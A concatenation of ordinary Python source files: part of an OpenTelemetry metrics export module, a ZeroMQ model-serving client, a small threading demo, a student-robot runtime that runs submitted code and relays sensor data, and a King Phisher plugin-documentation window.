self.out.write(self.formatter(metric))
self.out.flush()
return MetricExportResult.SUCCESS
def shutdown(self, timeout_millis: float = 30_000, **kwargs) -> None:
pass
class MetricReader(ABC):
"""
Base class for all metric readers
Args:
preferred_temporality: A mapping between instrument classes and
aggregation temporality. By default uses CUMULATIVE for all instrument
classes. This mapping will be used to define the default aggregation
temporality of every instrument class. If the user wants to make a
change in the default aggregation temporality of an instrument class,
it is enough to pass here a dictionary whose keys are the instrument
classes and the values are the corresponding desired aggregation
temporalities of the classes that the user wants to change, not all of
them. The classes not included in the passed dictionary will retain
their association to their default aggregation temporalities.
The value passed here will override the corresponding values set
via the environment variable
preferred_aggregation: A mapping between instrument classes and
aggregation instances. By default maps all instrument classes to an
instance of `DefaultAggregation`. This mapping will be used to
define the default aggregation of every instrument class. If the
user wants to make a change in the default aggregation of an
instrument class, it is enough to pass here a dictionary whose keys
are the instrument classes and the values are the corresponding
desired aggregation for the instrument classes that the user wants
to change, not necessarily all of them. The classes not included in
the passed dictionary will retain their association to their
default aggregations. The aggregation defined here will be
overridden by an aggregation defined by a view that is not
`DefaultAggregation`.
.. document protected _receive_metrics which is intended to be overridden by subclasses
.. automethod:: _receive_metrics
"""
# FIXME add :std:envvar:`OTEL_EXPORTER_OTLP_METRICS_TEMPORALITY_PREFERENCE`
# to the end of the documentation paragraph above.
def __init__(
self,
preferred_temporality: Dict[type, AggregationTemporality] = None,
preferred_aggregation: Dict[
type, "opentelemetry.sdk._metrics.view.Aggregation"
] = None,
) -> None:
self._collect: Callable[
[
"opentelemetry.sdk._metrics.export.MetricReader",
AggregationTemporality,
],
Iterable["opentelemetry.sdk._metrics.export.Metric"],
] = None
if (
environ.get(
_OTEL_EXPORTER_OTLP_METRICS_TEMPORALITY_PREFERENCE,
"CUMULATIVE",
)
.upper()
.strip()
== "DELTA"
):
self._instrument_class_temporality = {
Counter: AggregationTemporality.DELTA,
UpDownCounter: AggregationTemporality.CUMULATIVE,
Histogram: AggregationTemporality.DELTA,
ObservableCounter: AggregationTemporality.DELTA,
ObservableUpDownCounter: AggregationTemporality.CUMULATIVE,
ObservableGauge: AggregationTemporality.CUMULATIVE,
}
else:
self._instrument_class_temporality = {
Counter: AggregationTemporality.CUMULATIVE,
UpDownCounter: AggregationTemporality.CUMULATIVE,
Histogram: AggregationTemporality.CUMULATIVE,
ObservableCounter: AggregationTemporality.CUMULATIVE,
ObservableUpDownCounter: AggregationTemporality.CUMULATIVE,
ObservableGauge: AggregationTemporality.CUMULATIVE,
}
if preferred_temporality is not None:
for temporality in preferred_temporality.values():
if temporality not in (
AggregationTemporality.CUMULATIVE,
AggregationTemporality.DELTA,
):
raise Exception(
f"Invalid temporality value found {temporality}"
)
self._instrument_class_temporality.update(preferred_temporality or {})
self._preferred_temporality = preferred_temporality
self._instrument_class_aggregation = {
Counter: DefaultAggregation(),
UpDownCounter: DefaultAggregation(),
Histogram: DefaultAggregation(),
ObservableCounter: DefaultAggregation(),
ObservableUpDownCounter: DefaultAggregation(),
ObservableGauge: DefaultAggregation(),
}
self._instrument_class_aggregation.update(preferred_aggregation or {})
@final
def collect(self, timeout_millis: float = 10_000) -> None:
"""Collects the metrics from the internal SDK state and
invokes the `_receive_metrics` with the collection.
"""
if self._collect is None:
_logger.warning(
"Cannot call collect on a MetricReader until it is registered on a MeterProvider"
)
return
self._receive_metrics(
self._collect(self),
timeout_millis=timeout_millis,
)
@final
def _set_collect_callback(
self,
func: Callable[
[
"opentelemetry.sdk._metrics.export.MetricReader",
AggregationTemporality,
],
Iterable["opentelemetry.sdk._metrics.export.Metric"],
],
) -> None:
"""This function is internal to the SDK. It should not be called or overriden by users"""
self._collect = func
@abstractmethod
def _receive_metrics(
self,
metrics: Iterable["opentelemetry.sdk._metrics.export.Metric"],
timeout_millis: float = 10_000,
**kwargs,
) -> None:
"""Called by `MetricReader.collect` when it receives a batch of metrics"""
@abstractmethod
def shutdown(self, timeout_millis: float = 30_000, **kwargs) -> None:
"""Shuts down the MetricReader. This method provides a way
for the MetricReader to do any cleanup required. A metric reader can
only be shut down once; any subsequent calls are ignored and return
failure status.
When a `MetricReader` is registered on a
:class:`~opentelemetry.sdk._metrics.MeterProvider`,
:meth:`~opentelemetry.sdk._metrics.MeterProvider.shutdown` will invoke this
automatically.
"""
class InMemoryMetricReader(MetricReader):
"""Implementation of `MetricReader` that returns its metrics from :func:`get_metrics`.
This is useful for e.g. unit tests.
"""
def __init__(
self,
preferred_temporality: Dict[type, AggregationTemporality] = None,
preferred_aggregation: Dict[
type, "opentelemetry.sdk._metrics.view.Aggregation"
] = None,
) -> None:
super().__init__(
preferred_temporality=preferred_temporality,
preferred_aggregation=preferred_aggregation,
)
self._lock = RLock()
self._metrics: List["opentelemetry.sdk._metrics.export.Metric"] = []
def get_metrics(self) -> List["opentelemetry.sdk._metrics.export.Metric"]:
"""Reads and returns current metrics from the SDK"""
with self._lock:
self.collect()
metrics = self._metrics
self._metrics = []
return metrics
def _receive_metrics(
self,
metrics: Iterable["opentelemetry.sdk._metrics.export.Metric"],
timeout_millis: float = 10_000,
**kwargs,
) -> None:
with self._lock:
self._metrics = list(metrics)
def shutdown(self, timeout_millis: float = 30_000, **kwargs) -> None:
pass
class PeriodicExportingMetricReader(MetricReader):
"""`PeriodicExportingMetricReader` is an implementation of `MetricReader`
that collects metrics based on a user-configurable time interval, and passes the
metrics to the configured exporter.
"""
def __init__(
self,
exporter: MetricExporter,
preferred_temporality: Dict[type, AggregationTemporality] = None,
preferred_aggregation: Dict[
type, "opentelemetry.sdk._metrics.view.Aggregation"
] = None,
export_interval_millis: Optional[float] = None,
export_timeout_millis: Optional[float] = None,
) -> None:
super().__init__(
preferred_temporality=preferred_temporality,
preferred_aggregation=preferred_aggregation,
)
self._exporter = exporter
if export_interval_millis is None:
try:
export_interval_millis = float(
environ.get("OTEL_METRIC_EXPORT_INTERVAL", 60000)
)
except ValueError:
_logger.warning(
"Found invalid value for export interval, using default"
)
export_interval_millis = 60000
if export_timeout_millis is None:
try:
export_timeout_millis = float(
environ.get("OTEL_METRIC_EXPORT_TIMEOUT", 30000)
)
except ValueError:
_logger.warning(
"Found invalid value for export timeout, using default"
)
export_timeout_millis = 30000
self._export_interval_millis = export_interval_millis
self._export_timeout_millis = export_timeout_millis
self._shutdown = False
self._shutdown_event = Event()
self._shutdown_once = Once()
self._daemon_thread = Thread(target=self._ticker, daemon=True)
self._daemon_thread.start()
if hasattr(os, "register_at_fork"):
os.register_at_fork(
after_in_child=self._at_fork_reinit
) # pylint: disable=protected-access
def _at_fork_reinit(self):
self._daemon_thread = Thread(target=self._ticker, daemon=True)
self._daemon_thread.start()
def _ticker(self) -> None:
interval_secs = self._export_interval_millis / 1e3
while not self._shutdown_event.wait(interval_secs):
self.collect(timeout_millis=self._export_timeout_millis)
# one last collection below before shutting down completely
self.collect(timeout_millis=self._export_interval_millis)
def _receive_metrics(
self,
metrics: Iterable["opentelemetry.sdk._metrics.export.Metric"],
timeout_millis: float = 10_000,
**kwargs,
) -> None:
if metrics is None:
return
token = attach(set_value(_SUPPRESS_INSTRUMENTATION_KEY, True))
try:
self._exporter.export(metrics, timeout_millis=timeout_millis)
except Exception as e: # pylint: disable=broad-except,invalid-name
_logger.exception("Exception while exporting metrics %s", str(e))
detach(token)
def shutdown(self, timeout_millis: float = 30_000, **kwargs) -> None:
deadline_ns = _time_ns() + timeout_millis * 10**6
def _shutdown():
self._shutdown = True
did_set = self._shutdown_once.do_once(_shutdown)
if not did_set:
_logger.warning("Can't shutdown multiple times")
return
self._shutdown_event.set()
self._daemon_thread.join(timeout=(deadline_ns - _time_ns()) / 10**9)
self._exporter.shutdown(timeout_millis=(deadline_ns - _time_ns()) / 10**6)
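# Illustrative wiring sketch (not part of the SDK module above): how a
# PeriodicExportingMetricReader is typically paired with an exporter and a
# MeterProvider. The MeterProvider import path comes from the docstrings above;
# the metric_readers keyword and the meter/counter/attribute names are
# assumptions made for the example.
def _console_metrics_sketch():
    from opentelemetry.sdk._metrics import MeterProvider
    exporter = ConsoleMetricExporter()
    reader = PeriodicExportingMetricReader(exporter, export_interval_millis=5_000)
    provider = MeterProvider(metric_readers=[reader])
    meter = provider.get_meter("example-meter")
    counter = meter.create_counter("example.requests")
    counter.add(1, {"route": "/health"})
    provider.shutdown()  # flushes the reader and shuts the exporter down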
|
__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Han Xiao <[email protected]> <https://hanxiao.github.io>
import sys
import threading
import time
import uuid
from collections import namedtuple
from functools import wraps
import numpy as np
import zmq
from zmq.utils import jsonapi
__all__ = ['__version__', 'BaseClient', 'ConcurrentBaseClient']
# in the future client version must match with server version
__version__ = '0.0.1'
if sys.version_info >= (3, 0):
from ._py3_var import *
else:
from ._py2_var import *
# Data structure returned from the server.
# The send_multipart layout is [client_addr, x_info, x, req_id]; x_info can be parsed as JSON.
# id is req_id, content is [client_addr, x_info, x, req_id].
_Response = namedtuple('_Response', ['id', 'content'])
# Parsed form of the content field above:
# outputs is x (a numpy ndarray whose layout is given by x_info['shape'] and x_info['dtype'])
# extra_infos is taken from x_info['extra_infos']
Response = namedtuple('Response', ['id', 'outputs', 'extra_infos'])
class BaseClient(object):
def __init__(self, ip='localhost', port=5555, port_out=5556,
output_fmt='ndarray',
show_server_config=False,
identity=None,
check_version=True,
ignore_all_checks=False,
timeout=-1):
""" A client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `ignore_all_checks=True`
You can also use it as a context manager:
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
bc.encode(...)
# bc is automatically closed out of the context
:type timeout: int
:type check_version: bool
:type ignore_all_checks: bool
:type identity: str
:type show_server_config: bool
:type output_fmt: str
:type port_out: int
:type port: int
:type ip: str
:param ip: the ip address of the server
:param port: port for pushing data from client to server, must be consistent with the server side config
:param port_out: port for publishing results from server to client, must be consistent with the server side config
:param output_fmt: the output format of the sentence encodes, either in numpy array or python List[List[float]] (ndarray/list)
:param show_server_config: whether to show server configs when first connected
:param identity: the UUID of this client
:param check_version: check if server has the same version as client, raise AttributeError if not the same
:param check_length: check if server `max_seq_len` is less than the sentence length before sent
:param check_token_info: check if server can return tokenization
:param ignore_all_checks: ignore all checks, set it to True if you are not sure whether the server is ready when constructing BertClient()
:param timeout: set the timeout (milliseconds) for receive operation on the client, -1 means no timeout and wait until result returns
"""
self.context = zmq.Context()
self.sender = self.context.socket(zmq.PUSH)
self.sender.setsockopt(zmq.LINGER, 0)
self.identity = identity or str(uuid.uuid4()).encode('ascii')
self.sender.connect('tcp://%s:%d' % (ip, port))
self.receiver = self.context.socket(zmq.SUB)
self.receiver.setsockopt(zmq.LINGER, 0)
self.receiver.setsockopt(zmq.SUBSCRIBE, self.identity)
self.receiver.connect('tcp://%s:%d' % (ip, port_out))
self.request_id = 0
self.timeout = timeout
self.pending_request = set()
self.pending_response = {}
if output_fmt == 'ndarray':
self.formatter = lambda x: x
elif output_fmt == 'list':
self.formatter = lambda x: x.tolist()
else:
raise AttributeError('"output_fmt" must be "ndarray" or "list"')
self.output_fmt = output_fmt
self.port = port
self.port_out = port_out
self.ip = ip
self.check_version = check_version
if not ignore_all_checks and (check_version or show_server_config):
s_status = self.server_config
if check_version and s_status['server_version'] != self.client_status['client_version']:
raise AttributeError('version mismatch! server version is %s but client version is %s!\n'
'consider "pip install -U model-serving-server model-serving-client"\n'
'or disable version-check by "BaseClient(check_version=False)"' % (
s_status['server_version'], self.client_status['client_version']))
if show_server_config:
self._print_dict(s_status, 'server config:')
self.check_status(s_status)
def check_status(self, s_status):
pass
def close(self):
"""
Gently close all connections of the client. If you are using BertClient as context manager,
then this is not necessary.
"""
self.sender.close()
self.receiver.close()
self.context.term()
def _send(self, msg: bytes, msg_len: int = 0, extra_params: bytes = b''):
self.request_id += 1
# send the payload as multiple binary frames, see http://wiki.zeromq.org/blog:zero-copy
self.sender.send_multipart([self.identity, msg, b'%d' % self.request_id, b'%d' % msg_len, extra_params])
self.pending_request.add(self.request_id)
return self.request_id
def _recv(self, wait_for_req_id=None):
try:
while True:
# a request has been returned and found in pending_response
if wait_for_req_id in self.pending_response:
response = self.pending_response.pop(wait_for_req_id)
return _Response(wait_for_req_id, response)
# receive a response
response = self.receiver.recv_multipart()
request_id = int(response[-1])
# if not wait for particular response then simply return
if not wait_for_req_id or (wait_for_req_id == request_id):
self.pending_request.remove(request_id)
return _Response(request_id, response)
elif wait_for_req_id != request_id:
self.pending_response[request_id] = response
# wait for the next response
except Exception as e:
raise e
finally:
if wait_for_req_id in self.pending_request:
self.pending_request.remove(wait_for_req_id)
def _recv_ndarray(self, wait_for_req_id=None):
request_id, response = self._recv(wait_for_req_id)
# response : [client_addr, x_info, x, req_id]
arr_info, arr_val = jsonapi.loads(response[1]), response[2]
# TODO: _buffer wraps the payload in a memoryview to avoid an extra memory copy
X = np.frombuffer(_buffer(arr_val), dtype=str(arr_info['dtype']))
return Response(request_id, self.formatter(X.reshape(arr_info['shape'])), arr_info.get('extra_infos', ''))
@property
def client_status(self):
"""
Get the status of this BertClient instance
:rtype: dict[str, str]
:return: a dictionary containing the status of this BertClient instance
"""
return {
'identity': self.identity,
'num_request': self.request_id,
'num_pending_request': len(self.pending_request),
'pending_request': self.pending_request,
'output_fmt': self.output_fmt,
'port': self.port,
'port_out': self.port_out,
'server_ip': self.ip,
'client_version': __version__,
'timeout': self.timeout
}
def _timeout(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
if 'blocking' in kwargs and not kwargs['blocking']:
# override client timeout setting if `func` is called in non-blocking way
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
else:
self.receiver.setsockopt(zmq.RCVTIMEO, self.timeout)
try:
return func(self, *args, **kwargs)
except zmq.error.Again as _e:
t_e = TimeoutError(
'no response from the server (with "timeout"=%d ms), please check the following:'
'is the server still online? is the network broken? are "port" and "port_out" correct? '
'are you encoding a huge amount of data whereas the timeout is too small for that?' % self.timeout)
if _py2:
raise t_e
else:
_raise(t_e, _e)
finally:
self.receiver.setsockopt(zmq.RCVTIMEO, -1)
return arg_wrapper
@property
@_timeout
def server_config(self):
"""
Get the current configuration of the server connected to this client
:return: a dictionary containing the current configuration of the server connected to this client
:rtype: dict[str, str]
"""
req_id = self._send(b'SHOW_CONFIG')
return jsonapi.loads(self._recv(req_id).content[1])
@property
@_timeout
def server_status(self):
"""
Get the current status of the server connected to this client
:return: a dictionary containing the current status of the server connected to this client
:rtype: dict[str, str]
"""
req_id = self._send(b'SHOW_STATUS')
return jsonapi.loads(self._recv(req_id).content[1])
@_timeout
def infer(self, inputs, blocking=True):
""" infer a list of input to a list of vectors
`texts` should be a list of strings, each of which represents a sentence.
If `is_tokenized` is set to True, then `texts` should be list[list[str]],
outer list represents sentence and inner list represent tokens in the sentence.
Note that if `blocking` is set to False, then you need to fetch the result manually afterwards.
.. highlight:: python
.. code-block:: python
with BertClient() as bc:
# encode untokenized sentences
bc.encode(['First do it',
'then do it right',
'then do it better'])
# encode tokenized sentences
bc.encode([['First', 'do', 'it'],
['then', 'do', 'it', 'right'],
['then', 'do', 'it', 'better']], is_tokenized=True)
:type is_tokenized: bool
:type show_tokens: bool
:type blocking: bool
:type timeout: bool
:type texts: list[str] or list[list[str]]
:param is_tokenized: whether the input texts is already tokenized
:param show_tokens: whether to include tokenization result from the server. If true, the return of the function will be a tuple
:param texts: list of sentence to be encoded. Larger list for better efficiency.
:param blocking: wait until the encoded result is returned from the server. If false, will immediately return.
:param timeout: throw a timeout error when the encoding takes longer than the predefined timeout.
:return: encoded sentence/token-level embeddings, rows correspond to sentences
:rtype: numpy.ndarray or list[list[float]]
"""
self._check_input_lst(inputs)
req_id = self._send(jsonapi.dumps(inputs), len(inputs))
if not blocking:
return None
r = self._recv_ndarray(req_id)
return r.outputs, r.extra_infos
def fetch(self, delay=.0):
""" Fetch the encoded vectors from server, use it with `encode(blocking=False)`
Use it after `encode(texts, blocking=False)`. If there is no pending requests, will return None.
Note that `fetch()` does not preserve the order of the requests! Say you have two non-blocking requests,
R1 and R2, where R1 with 256 samples, R2 with 1 samples. It could be that R2 returns first.
To fetch all results in the original sending order, please use `fetch_all(sort=True)`
:type delay: float
:param delay: delay in seconds and then run fetcher
:return: a generator that yields request id and encoded vector in a tuple, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
"""
time.sleep(delay)
while self.pending_request:
yield self._recv_ndarray()
def fetch_all(self, sort=True, concat=False):
""" Fetch all encoded vectors from server, use it with `encode(blocking=False)`
Use it `encode(texts, blocking=False)`. If there is no pending requests, it will return None.
:type sort: bool
:type concat: bool
:param sort: sort results by their request ids. It should be True if you want to preserve the sending order
:param concat: concatenate all results into one ndarray
:return: encoded sentence/token-level embeddings in sending order
:rtype: numpy.ndarray or list[list[float]]
"""
if self.pending_request:
tmp = list(self.fetch())
if sort:
tmp = sorted(tmp, key=lambda v: v.id)
tmp = [v.outputs for v in tmp]
if concat:
if self.output_fmt == 'ndarray':
tmp = np.concatenate(tmp, axis=0)
elif self.output_fmt == 'list':
tmp = [vv for v in tmp for vv in v]
return tmp
def infer_async(self, batch_generator, max_num_batch=None, delay=0.1, **kwargs):
""" Async encode batches from a generator
:param delay: delay in seconds and then run fetcher
:param batch_generator: a generator that yields list[str] or list[list[str]] (for `is_tokenized=True`) every time
:param max_num_batch: stop after encoding this number of batches
:param `**kwargs`: the rest parameters please refer to `encode()`
:return: a generator that yields encoded vectors in ndarray, where the request id can be used to determine the order
:rtype: Iterator[tuple(int, numpy.ndarray)]
"""
def run():
cnt = 0
for inputs in batch_generator:
self.infer(inputs, blocking=False, **kwargs)
cnt += 1
if max_num_batch and cnt == max_num_batch:
break
t = threading.Thread(target=run)
t.start()
return self.fetch(delay)
@staticmethod
def _check_input_lst(inputs):
if not isinstance(inputs, list):
raise TypeError('"%s" must be %s, but received %s' % (inputs, type([]), type(inputs)))
@staticmethod
def _print_dict(x, title=None):
if title:
print(title)
for k, v in x.items():
print('%30s\t=\t%-30s' % (k, v))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
class BCManager():
def __init__(self, available_bc):
self.available_bc = available_bc
self.bc = None
def __enter__(self):
self.bc = self.available_bc.pop()
return self.bc
def __exit__(self, *args):
self.available_bc.append(self.bc)
class ConcurrentBaseClient(BaseClient):
def __init__(self, max_concurrency=10, **kwargs):
""" A thread-safe client object connected to a BertServer
Create a BertClient that connects to a BertServer.
Note, server must be ready at the moment you are calling this function.
If you are not sure whether the server is ready, then please set `ignore_all_checks=True`
:type max_concurrency: int
:param max_concurrency: the maximum number of concurrent connections allowed
"""
try:
from model_serving.client import BaseClient
except ImportError:
raise ImportError('BaseClient module is not available, it is required by ConcurrentBaseClient. '
'Please use "pip install -U model-serving-client" to install it.')
self.available_bc = [BaseClient(**kwargs) for _ in range(max_concurrency)]
self.max_concurrency = max_concurrency
def close(self):
for bc in self.available_bc:
bc.close()
def _concurrent(func):
@wraps(func)
def arg_wrapper(self, *args, **kwargs):
try:
with BCManager(self.available_bc) as bc:
f = getattr(bc, func.__name__)
r = f if isinstance(f, dict) else f(*args, **kwargs)
return r
except IndexError:
raise RuntimeError('Too many concurrent connections!'
'Try to increase the value of "max_concurrency", '
'currently =%d' % self.max_concurrency)
return arg_wrapper
@_concurrent
def infer(self, **kwargs):
pass
@property
@_concurrent
def server_config(self):
pass
@property
@_concurrent
def server_status(self):
pass
@property
@_concurrent
def client_status(self):
pass
def fetch(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBaseClient" is not implemented yet')
def fetch_all(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBaseClient" is not implemented yet')
def infer_async(self, **kwargs):
raise NotImplementedError('Async encoding of "ConcurrentBaseClient" is not implemented yet')
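# Illustrative usage sketch (not part of the library): it assumes a compatible
# serving process is already listening on the default ports, and the payload
# passed to infer() is made up purely for demonstration.
def _example_infer():
    with BaseClient(ip='localhost', port=5555, port_out=5556,
                    ignore_all_checks=True, timeout=10000) as bc:
        outputs, extra_infos = bc.infer([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
        print(outputs, extra_infos)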
|
multiple_variables_with_threads.py
|
import threading
import queue
def print_cube(num):
"""
function to print cube of given num
"""
print("Cube: {}".format(num * num * num))
def print_square(count,row,q1):
"""
function to increment count and row, passing count back to the caller through the queue
"""
count +=1
row +=1
q1.put(count)
#q1.put(row)
# print("Square: {}".format(num * num))
if __name__ == "__main__":
count=0
row=0
print('hi')
# creating thread
q1=queue.Queue()
t1 = threading.Thread(target=print_square, args=(count,row,q1))
# t2 = threading.Thread(target=print_cube, args=(10,))
# starting thread 1
t1.start()
# starting thread 2
#t2.start()
# wait until thread 1 is completely executed
t1.join()
count=q1.get()
#row=q1.get()
print('count post',count)
print('row post', row)
# wait until thread 2 is completely executed
# t2.join()
# both threads completely executed
print("Done!")
|
runtime.py
|
import subprocess, multiprocessing, time
import memcache, ansible, hibike
from grizzly import *
import usb
import os
# Useful motor mappings
name_to_grizzly, name_to_values, name_to_ids = {}, {}, {}
student_proc, console_proc = None, None
robot_status = 0 # a boolean for whether or not the robot is executing code
if 'HIBIKE_SIMULATOR' in os.environ and os.environ['HIBIKE_SIMULATOR'] in ['1', 'True', 'true']:
import hibike_simulator
h = hibike_simulator.Hibike()
else:
h = hibike.Hibike()
connectedDevices = h.getEnumeratedDevices()
print(connectedDevices)
# TODO: the polling delay should not be hard-coded
connectedDevices = [(device, 50) for (device, device_type) in connectedDevices]
h.subToDevices(connectedDevices)
# connect to memcache
memcache_port = 12357
mc = memcache.Client(['127.0.0.1:%d' % memcache_port])
mc.set('gamepad', {0: {'axes': [0,0,0,0], 'buttons': None, 'connected': None, 'mapping': None}})
def get_all_data(connectedDevices):
all_data = {}
for t in connectedDevices:
count = 1
tup_nest = h.getData(t[0], "dataUpdate")
if not tup_nest:
continue
tup_vals = tup_nest[0]
for i in tup_vals:
all_data[str(count) + str(t[0])] = i
count += 1
return all_data
# Called on start of student code; finds and configures all the connected motors
def initialize_motors():
try:
addrs = Grizzly.get_all_ids()
except usb.USBError:
print("WARNING: no Grizzly Bear devices found")
addrs = []
# Brute force to find all
for index in range(len(addrs)):
# default name for motors is motor0, motor1, motor2, etc
grizzly_motor = Grizzly(addrs[index])
grizzly_motor.set_mode(ControlMode.NO_PID, DriveMode.DRIVE_COAST)
grizzly_motor.set_target(0)
name_to_grizzly['motor' + str(index)] = grizzly_motor
name_to_values['motor' + str(index)] = 0
name_to_ids['motor' + str(index)] = addrs[index]
mc.set('motor_values', name_to_values)
# Called on end of student code, sets all motor values to zero
def stop_motors():
for name, grizzly in name_to_grizzly.iteritems():
grizzly.set_target(0)
name_to_values[name] = 0
mc.set('motor_values', name_to_values)
# A process for sending the output of student code to the UI
def log_output(stream):
#TODO: figure out a way to limit speed of sending messages, so
# ansible is not overflowed by printing too fast
for line in stream:
ansible.send_message('UPDATE_CONSOLE', {
'console_output': {
'value': line
}
})
def msg_handling(msg):
global robot_status, student_proc, console_proc
msg_type, content = msg['header']['msg_type'], msg['content']
if msg_type == 'execute' and not robot_status:
with open('student_code.py', 'w+') as f:
f.write(msg['content']['code'])
student_proc = subprocess.Popen(['python', '-u', 'student_code.py'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# turns student process stdout into a stream for sending to frontend
lines_iter = iter(student_proc.stdout.readline, b'')
# start process for watching for student code output
console_proc = multiprocessing.Process(target=log_output, args=(lines_iter,))
console_proc.start()
initialize_motors()
robot_status= 1
elif msg_type == 'stop' and robot_status:
student_proc.terminate()
console_proc.terminate()
stop_motors()
robot_status = 0
peripheral_data_last_sent = 0
def send_peripheral_data(data):
global peripheral_data_last_sent
# TODO: This is a hack. Should put this into a separate process
if time.time() < peripheral_data_last_sent + 1:
return
peripheral_data_last_sent = time.time()
# Send sensor data
for device_id, value in data.items():
ansible.send_message('UPDATE_PERIPHERAL', {
'peripheral': {
'name': 'sensor_{}'.format(device_id),
'peripheralType':'SENSOR_BOOLEAN',
'value': value,
'id': device_id
}
})
while True:
msg = ansible.recv()
# Handle any incoming commands from the UI
if msg:
msg_handling(msg)
# Send whether or not robot is executing code
ansible.send_message('UPDATE_STATUS', {
'status': {'value': robot_status}
})
# Send battery level
ansible.send_message('UPDATE_BATTERY', {
'battery': {
'value': 100 # TODO: Make this not a lie
}
})
ansible.send_message('UPDATE_PERIPHERAL', {
'peripheral': {
'name': name,
'peripheralType':'MOTOR_SCALAR',
'value': name_to_value[name],
'id': name_to_ids[name]
}
})
# Update sensor values, and send to UI
all_sensor_data = get_all_data(connectedDevices)
send_peripheral_data(all_sensor_data)
mc.set('sensor_values', all_sensor_data)
# Send motor values to UI, if the robot is running
if robot_status:
name_to_value = mc.get('motor_values') or {}
for name in name_to_value:
grizzly = name_to_grizzly[name]
try:
grizzly.set_target(name_to_value[name])
except:
stop_motors()
time.sleep(0.05)
|
plugin_manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/windows/plugin_manager.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import collections
import copy
import datetime
import errno
import functools
import os
import sys
import traceback
import xml.sax.saxutils as saxutils
from king_phisher import startup
from king_phisher import utilities
from king_phisher.catalog import Catalog
from king_phisher.client import plugins
from king_phisher.client import gui_utilities
from king_phisher.client.widget import managers
from king_phisher.client.windows import html
from gi.repository import Gdk
from gi.repository import Gtk
import requests.exceptions
import smoke_zephyr.requirements
import smoke_zephyr.utilities
__all__ = ('PluginManagerWindow',)
_ROW_TYPE_PLUGIN = 'plugin'
_ROW_TYPE_REPOSITORY = 'repository'
_ROW_TYPE_CATALOG = 'catalog'
_LOCAL_REPOSITORY_ID = 'local'
_LOCAL_REPOSITORY_TITLE = '[Locally Installed]'
_ModelNamedRow = collections.namedtuple('ModelNamedRow', (
'id',
'installed',
'enabled',
'title',
'compatibility',
'version',
'visible_enabled',
'visible_installed',
'sensitive_installed',
'type'
))
class _ModelNode(object):
__slots__ = ('children', 'row')
def __init__(self, *args, **kwargs):
self.row = _ModelNamedRow(*args, **kwargs)
self.children = collections.deque()
class PluginDocumentationWindow(html.HTMLWindow):
"""
A window for displaying plugin documentation from their respective README.md
files. If the documentation file can not be found a
:py:exc:`.FileNotFoundError` exception will be raised on initialization. The
contents of the README.md file is then rendered as markdown data and
displayed using an :py:class:`~king_phisher.client.windows.html.HTMLWindow`.
The plugin must be loaded into the
:py:attr:`~king_phisher.client.application.KingPhisherClientApplication.plugin_manager`
but does not have to be enabled for documentation to be displayed.
"""
template = 'plugin-documentation.html'
"""The Jinja2 HTML template to load for hosting the rendered markdown documentation."""
def __init__(self, application, plugin_id):
"""
:param application: The parent application for this object.
:type application: :py:class:`Gtk.Application`
:param str plugin_id: The identifier of this plugin.
"""
super(PluginDocumentationWindow, self).__init__(application)
plugin_path = self.application.plugin_manager.get_plugin_path(plugin_id)
if plugin_path is None:
raise FileNotFoundError(errno.ENOENT, "could not find the data path for plugin '{0}'".format(plugin_id))
md_file = os.path.join(plugin_path, 'README.md')
if md_file is None or not os.path.isfile(md_file):
raise FileNotFoundError(errno.ENOENT, "plugin '{0}' has no documentation".format(plugin_id), md_file)
self._md_file = md_file
self._plugin = self.application.plugin_manager[plugin_id]
self.refresh()
self.webview.connect('key-press-event', self.signal_key_press_event)
self.webview.connect('open-remote-uri', self.signal_webview_open_remote_uri)
self.window.set_title('Plugin Documentation')
def refresh(self):
"""
Refresh the contents of the documentation. This will reload both the
markdown content from README.md as well as the HTML template file.
"""
self.webview.load_markdown_file(self._md_file, template=self.template, template_vars={'plugin': self._plugin})
def signal_webview_open_remote_uri(self, webview, uri, decision):
utilities.open_uri(uri)
def signal_key_press_event(self, webview, event):
if event.type != Gdk.EventType.KEY_PRESS:
return
keyval = event.get_keyval()[1]
if keyval == Gdk.KEY_F5:
self.refresh()
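# A minimal usage sketch (hypothetical identifiers): the window is normally
# constructed on demand from a GUI callback such as the plugin manager's
# "Show Documentation" menu item, for example:
#
#     try:
#         PluginDocumentationWindow(application, 'example_plugin')
#     except FileNotFoundError as error:
#         gui_utilities.show_dialog_warning('No Documentation', parent_window, error.strerror)
#
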